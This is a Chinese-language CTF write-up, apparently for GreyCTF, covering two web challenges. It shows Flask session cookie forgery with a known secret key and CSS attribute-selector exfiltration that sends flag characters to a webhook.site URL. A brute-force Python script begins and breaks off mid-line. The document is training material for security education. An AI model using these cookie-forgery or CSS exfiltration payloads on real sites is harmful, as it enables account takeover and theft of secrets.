<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span>&#x27;is_admin&#x27;<span class="punctuation">:</span> False<span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>之后伪造</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 flask_session_cookie_manager3.py encode -s <span class="string">&quot;baby-web&quot;</span> -t <span class="string">&quot;&#123;&#x27;is_admin&#x27;: True&#125;&quot;</span></span><br></pre></td></tr></table></figure>

<p>得到伪造的session</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eyJpc19hZG1pbiI6dHJ1ZX0.ZiVFrw.5KhLMB4XVo0BjmX4iJXPb5Am3z0</span><br></pre></td></tr></table></figure>

<p>伪造成功访问admin还是没有拿到flag，但是看源码，flag是传到admin页面的，我们看源码</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;utf-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">&quot;viewport&quot;</span> <span class="attr">content</span>=<span class="string">&quot;width=device-width, initial-scale=1&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>Bootstrap demo<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">link</span> <span class="attr">async</span>=<span class="string">&quot;&quot;</span> <span class="attr">href</span>=<span class="string">&quot;https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css&quot;</span> <span class="attr">rel</span>=<span class="string">&quot;stylesheet&quot;</span> <span class="attr">integrity</span>=<span class="string">&quot;sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH&quot;</span> <span class="attr">crossorigin</span>=<span class="string">&quot;anonymous&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="language-css">                      <span class="selector-class">.htmx-indicator</span>&#123;<span class="attribute">opacity</span>:<span class="number">0</span>&#125;                      <span class="selector-class">.htmx-request</span> <span class="selector-class">.htmx-indicator</span>&#123;<span class="attribute">opacity</span>:<span class="number">1</span>; <span class="attribute">transition</span>: opacity <span class="number">200ms</span> ease-in;&#125;                      <span class="selector-class">.htmx-request</span><span class="selector-class">.htmx-indicator</span>&#123;<span class="attribute">opacity</span>:<span class="number">1</span>; <span class="attribute">transition</span>: opacity <span class="number">200ms</span> ease-in;&#125;                    </span><span class="tag">&lt;/<span class="name">style</span>&gt;</span><span class="tag">&lt;<span class="name">style</span> <span class="attr">type</span>=<span class="string">&quot;text/css&quot;</span>&gt;</span><span class="language-css"><span class="selector-id">#_copy</span>&#123;<span class="attribute">align-items</span>:center;<span class="attribute">background</span>:<span class="number">#4494d5</span>;<span class="attribute">border-radius</span>:<span class="number">3px</span>;<span class="attribute">color</span>:<span class="number">#fff</span>;<span class="attribute">cursor</span>:pointer;<span class="attribute">display</span>:flex;<span class="attribute">font-size</span>:<span class="number">13px</span>;<span class="attribute">height</span>:<span class="number">30px</span>;<span class="attribute">justify-content</span>:center;<span class="attribute">position</span>:absolute;<span class="attribute">width</span>:<span class="number">60px</span>;<span class="attribute">z-index</span>:<span class="number">1000</span>&#125;<span class="selector-id">#select-tooltip</span>,<span class="selector-id">#sfModal</span>,<span class="selector-class">.modal-backdrop</span>,<span class="selector-tag">div</span><span class="selector-attr">[id^=reader-helper]</span>&#123;<span class="attribute">display</span>:none<span class="meta">!important</span>&#125;<span class="selector-class">.modal-open</span>&#123;<span class="attribute">overflow</span>:auto<span class="meta">!important</span>&#125;._sf_adjust_body&#123;<span class="attribute">padding-right</span>:<span class="number">0</span><span class="meta">!important</span>&#125;<span class="selector-class">.super_copy_btns_div</span>&#123;<span class="attribute">position</span>:fixed;<span class="attribute">width</span>:<span class="number">154px</span>;<span class="attribute">left</span>:<span class="number">10px</span>;<span class="attribute">top</span>:<span class="number">45%</span>;<span class="attribute">background</span>:<span class="number">#e7f1ff</span>;<span class="attribute">border</span>:<span class="number">2px</span> solid <span class="number">#4595d5</span>;<span class="attribute">font-weight</span>:<span class="number">600</span>;<span class="attribute">border-radius</span>:<span class="number">2px</span>;<span class="attribute">font-family</span>:-apple-system,BlinkMacSystemFont,Segoe UI,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;<span class="attribute">z-index</span>:<span class="number">5000</span>&#125;<span class="selector-class">.super_copy_btns_logo</span>&#123;<span class="attribute">width</span>:<span class="number">100%</span>;<span class="attribute">background</span>:<span class="number">#4595d5</span>;<span class="attribute">text-align</span>:center;<span class="attribute">font-size</span>:<span class="number">12px</span>;<span class="attribute">color</span>:<span class="number">#e7f1ff</span>;<span class="attribute">line-height</span>:<span class="number">30px</span>;<span class="attribute">height</span>:<span class="number">30px</span>&#125;<span class="selector-class">.super_copy_btns_btn</span>&#123;<span class="attribute">display</span>:block;<span class="attribute">width</span>:<span class="number">128px</span>;<span class="attribute">height</span>:<span class="number">28px</span>;<span class="attribute">background</span>:<span class="number">#7f5711</span>;<span class="attribute">border-radius</span>:<span class="number">4px</span>;<span class="attribute">color</span>:<span class="number">#fff</span>;<span class="attribute">font-size</span>:<span class="number">12px</span>;<span class="attribute">border</span>:<span class="number">0</span>;<span class="attribute">outline</span>:<span class="number">0</span>;<span class="attribute">margin</span>:<span class="number">8px</span> auto;<span class="attribute">font-weight</span>:<span class="number">700</span>;<span class="attribute">cursor</span>:pointer;<span class="attribute">opacity</span>:.<span class="number">9</span>&#125;<span class="selector-class">.super_copy_btns_btn</span><span class="selector-pseudo">:hover</span>&#123;<span class="attribute">opacity</span>:.<span class="number">8</span>&#125;<span class="selector-class">.super_copy_btns_btn</span><span class="selector-pseudo">:active</span>&#123;<span class="attribute">opacity</span>:<span class="number">1</span>&#125;</span><span class="tag">&lt;/<span class="name">style</span>&gt;</span><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">nav</span> <span class="attr">class</span>=<span class="string">&quot;navbar navbar-expand-lg bg-body-tertiary&quot;</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;container-fluid&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">a</span> <span class="attr">class</span>=<span class="string">&quot;navbar-brand&quot;</span> <span class="attr">href</span>=<span class="string">&quot;/&quot;</span>&gt;</span>Baby Web<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">button</span> <span class="attr">class</span>=<span class="string">&quot;navbar-toggler&quot;</span> <span class="attr">type</span>=<span class="string">&quot;button&quot;</span> <span class="attr">data-bs-toggle</span>=<span class="string">&quot;collapse&quot;</span> <span class="attr">data-bs-target</span>=<span class="string">&quot;#navbarNav&quot;</span> <span class="attr">aria-controls</span>=<span class="string">&quot;navbarNav&quot;</span> <span class="attr">aria-expanded</span>=<span class="string">&quot;false&quot;</span> <span class="attr">aria-label</span>=<span class="string">&quot;Toggle navigation&quot;</span>&gt;</span></span><br><span class="line">          <span class="tag">&lt;<span class="name">span</span> <span class="attr">class</span>=<span class="string">&quot;navbar-toggler-icon&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">span</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">button</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;collapse navbar-collapse&quot;</span> <span class="attr">id</span>=<span class="string">&quot;navbarNav&quot;</span>&gt;</span></span><br><span class="line">          <span class="tag">&lt;<span class="name">ul</span> <span class="attr">class</span>=<span class="string">&quot;navbar-nav&quot;</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">li</span> <span class="attr">class</span>=<span class="string">&quot;nav-item&quot;</span>&gt;</span></span><br><span class="line">              <span class="tag">&lt;<span class="name">a</span> <span class="attr">class</span>=<span class="string">&quot;nav-link&quot;</span> <span class="attr">href</span>=<span class="string">&quot;/admin&quot;</span>&gt;</span>Admin<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;/<span class="name">li</span>&gt;</span></span><br><span class="line">          <span class="tag">&lt;/<span class="name">ul</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">nav</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;container&quot;</span>&gt;</span></span><br><span class="line">      </span><br><span class="line">    </span><br><span class="line">    <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;container&quot;</span> <span class="attr">role</span>=<span class="string">&quot;doc-abstract&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">h2</span>&gt;</span>Admin Page<span class="tag">&lt;/<span class="name">h2</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">p</span>&gt;</span>This website is still under construction. I have completed the admin page where only I can access.<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">p</span>&gt;</span>Too bad my secret is not so easily given away<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">button</span> <span class="attr">type</span>=<span class="string">&quot;button&quot;</span> <span class="attr">class</span>=<span class="string">&quot;btn btn-primary&quot;</span> <span class="attr">data-bs-toggle</span>=<span class="string">&quot;modal&quot;</span> <span class="attr">data-bs-target</span>=<span class="string">&quot;#exampleModal&quot;</span> <span class="attr">hidden</span>=<span class="string">&quot;&quot;</span>&gt;</span></span><br><span class="line">        Super Secret Admin Button</span><br><span class="line">    <span class="tag">&lt;/<span class="name">button</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- Modal --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;modal fade&quot;</span> <span class="attr">id</span>=<span class="string">&quot;exampleModal&quot;</span> <span class="attr">tabindex</span>=<span class="string">&quot;-1&quot;</span> <span class="attr">aria-labelledby</span>=<span class="string">&quot;exampleModalLabel&quot;</span> <span class="attr">aria-hidden</span>=<span class="string">&quot;true&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;modal-dialog&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;modal-content&quot;</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;modal-header&quot;</span>&gt;</span></span><br><span class="line">                <span class="tag">&lt;<span class="name">h1</span> <span class="attr">class</span>=<span class="string">&quot;modal-title fs-5&quot;</span> <span class="attr">id</span>=<span class="string">&quot;exampleModalLabel&quot;</span>&gt;</span>Admin Modal<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">                <span class="tag">&lt;<span class="name">button</span> <span class="attr">type</span>=<span class="string">&quot;button&quot;</span> <span class="attr">class</span>=<span class="string">&quot;btn-close&quot;</span> <span class="attr">data-bs-dismiss</span>=<span class="string">&quot;modal&quot;</span> <span class="attr">aria-label</span>=<span class="string">&quot;Close&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">button</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;modal-body&quot;</span>&gt;</span></span><br><span class="line">                Wow!, you found the super secret admin button.</span><br><span class="line">                <span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">                <span class="tag">&lt;<span class="name">button</span> <span class="attr">hx-get</span>=<span class="string">&quot;/flag&quot;</span> <span class="attr">hx-swap</span>=<span class="string">&quot;outerHTML&quot;</span> <span class="attr">class</span>=<span class="string">&quot;btn btn-secondary&quot;</span>&gt;</span></span><br><span class="line">                    Here is an even more secret button.</span><br><span class="line">                <span class="tag">&lt;/<span class="name">button</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;modal-footer&quot;</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">button</span> <span class="attr">type</span>=<span class="string">&quot;button&quot;</span> <span class="attr">class</span>=<span class="string">&quot;btn btn-secondary&quot;</span> <span class="attr">data-bs-dismiss</span>=<span class="string">&quot;modal&quot;</span>&gt;</span>Close<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">    <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">async</span>=<span class="string">&quot;&quot;</span> <span class="attr">src</span>=<span class="string">&quot;https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js&quot;</span> <span class="attr">integrity</span>=<span class="string">&quot;sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz&quot;</span> <span class="attr">crossorigin</span>=<span class="string">&quot;anonymous&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;https://unpkg.com/htmx.org@1.9.11&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"> </span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>我们可以看到有个这个按钮</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">button</span> <span class="attr">type</span>=<span class="string">&quot;button&quot;</span> <span class="attr">class</span>=<span class="string">&quot;btn btn-primary&quot;</span> <span class="attr">data-bs-toggle</span>=<span class="string">&quot;modal&quot;</span> <span class="attr">data-bs-target</span>=<span class="string">&quot;#exampleModal&quot;</span> <span class="attr">hidden</span>=<span class="string">&quot;&quot;</span>&gt;</span></span><br><span class="line">        Super Secret Admin Button</span><br><span class="line">    <span class="tag">&lt;/<span class="name">button</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>里面有个<code>hidden=&quot;&quot;</code>属性</p>
<p>隐藏了这个按钮，我们只要把这个属性删掉，这个按钮就回来了</p>
<p>之后点击按钮得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grey&#123;0h_n0_mY_5up3r_53cr3t_4dm1n_fl4g&#125;</span><br></pre></td></tr></table></figure>



<h2 id="Beautiful-Styles-70-solves-100-points"><a href="#Beautiful-Styles-70-solves-100-points" class="headerlink" title="Beautiful Styles(70 solves &#x2F; 100 points)"></a><strong>Beautiful Styles</strong>(70 solves &#x2F; 100 points)</h2><p>给了一个html，然后让我们自己写css来修改这个html的样式，html代码如下</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;utf-8&quot;</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">&quot;viewport&quot;</span> <span class="attr">content</span>=<span class="string">&quot;width=device-width, initial-scale=1&quot;</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>My Beautiful Site<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">link</span></span></span><br><span class="line"><span class="tag">      <span class="attr">href</span>=<span class="string">&quot;https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css&quot;</span></span></span><br><span class="line"><span class="tag">      <span class="attr">rel</span>=<span class="string">&quot;stylesheet&quot;</span></span></span><br><span class="line"><span class="tag">      <span class="attr">integrity</span>=<span class="string">&quot;sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN&quot;</span></span></span><br><span class="line"><span class="tag">      <span class="attr">crossorigin</span>=<span class="string">&quot;anonymous&quot;</span></span></span><br><span class="line"><span class="tag">    /&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">link</span> <span class="attr">href</span>=<span class="string">&quot;/uploads/&#123;&#123;submit_id&#125;&#125;.css&quot;</span> <span class="attr">rel</span>=<span class="string">&quot;stylesheet&quot;</span> /&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;container&quot;</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">h1</span> <span class="attr">id</span>=<span class="string">&quot;title&quot;</span>&gt;</span>Welcome to my beautiful site<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">p</span> <span class="attr">id</span>=<span class="string">&quot;sub-header&quot;</span>&gt;</span></span><br><span class="line">        Here is some content that I want to share with you. An example can be</span><br><span class="line">        this flag:</span><br><span class="line">      <span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">input</span> <span class="attr">id</span>=<span class="string">&quot;flag&quot;</span> <span class="attr">value</span>=<span class="string">&quot;&#123;&#123; flag &#125;&#125;&quot;</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;container mt-4&quot;</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;/judge/&#123;&#123;submit_id&#125;&#125;&quot;</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;Submit for judging&quot;</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span></span></span><br><span class="line"><span class="tag">      <span class="attr">src</span>=<span class="string">&quot;https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js&quot;</span></span></span><br><span class="line"><span class="tag">      <span class="attr">integrity</span>=<span class="string">&quot;sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL&quot;</span></span></span><br><span class="line"><span class="tag">      <span class="attr">crossorigin</span>=<span class="string">&quot;anonymous&quot;</span></span></span><br><span class="line"><span class="tag">    &gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>上传上去预览样式之后可以上传后台，由管理员检查，那么可以确定是xss了，目的应该是要我们读取</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">id</span>=<span class="string">&quot;flag&quot;</span> <span class="attr">value</span>=<span class="string">&quot;&#123;&#123; flag &#125;&#125;&quot;</span> /&gt;</span></span><br></pre></td></tr></table></figure>

<p>中<code>&#123;&#123; flag &#125;&#125;</code>的内容，通过css来xss，直接看这篇文章(波兰语，看不懂机翻)</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/">https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/</a></p>
</blockquote>
<p>简单解释一下就是</p>
<p>下面是匹配<code>input</code>标签中<code>value</code>值为abc的标签</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value=<span class="string">&quot;abc&quot;</span>]</span> &#123;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>下面是匹配<code>input</code>标签中<code>value</code>值为的<strong>开头</strong>为a的标签</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">&quot;a&quot;</span>]</span> &#123;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">background</span>: <span class="built_in">url</span>(<span class="string">https://webhook.site/886c0266-b6f5-4dc0-ae07-a9565f6b907a/</span>);会对地址进行访问</span><br></pre></td></tr></table></figure>

<p>结合一下</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[value^=<span class="string">&quot;g&quot;</span>]</span> &#123;</span><br><span class="line"><span class="attribute">background</span>: <span class="built_in">url</span>(<span class="string">https://webhook.site/886c0266-b6f5-4dc0-ae07-a9565f6b907a/g</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>就会匹配对应位置的字母，通过是否能接收到来进行盲注，下面是盲注代码，因为要两段访问获取，所以用bs4进行匹配一下，至于连续的爆破字符，需要通过接收站的api，过于麻烦就没有写，之后，题目提示</p>
<blockquote>
<p>Flag only consists of numbers and uppercase letters and the lowercase character <code>f</code> (the exception is the flag format of grey{.+})</p>
<p>Flag仅由数字、大写字母和小写字符<code>f</code>组成(例外情况是Flag格式为grey{.+})</p>
</blockquote>
<p>那么我们就能构造出盲注代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">headers = &#123;</span><br><span class="line">    <span class="string">&quot;Host&quot;</span>: <span class="string">&quot;challs.nusgreyhats.org:33339&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Content-Length&quot;</span>: <span class="string">&quot;149&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Cache-Control&quot;</span>: <span class="string">&quot;max-age=0&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Upgrade-Insecure-Requests&quot;</span>: <span class="string">&quot;1&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Origin&quot;</span>: <span class="string">&quot;http://challs.nusgreyhats.org:33339&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Content-Type&quot;</span>: <span class="string">&quot;application/x-www-form-urlencoded&quot;</span>,</span><br><span class="line">    <span class="string">&quot;User-Agent&quot;</span>: <span class="string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Accept&quot;</span>: <span class="string">&quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Referer&quot;</span>: <span class="string">&quot;http://challs.nusgreyhats.org:33339/&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Accept-Encoding&quot;</span>: <span class="string">&quot;gzip, deflate&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Accept-Language&quot;</span>: <span class="string">&quot;zh-CN,zh;q=0.9&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Connection&quot;</span>: <span class="string">&quot;close&quot;</span>,</span><br><span class="line">&#125;</span><br><span class="line">arr=<span 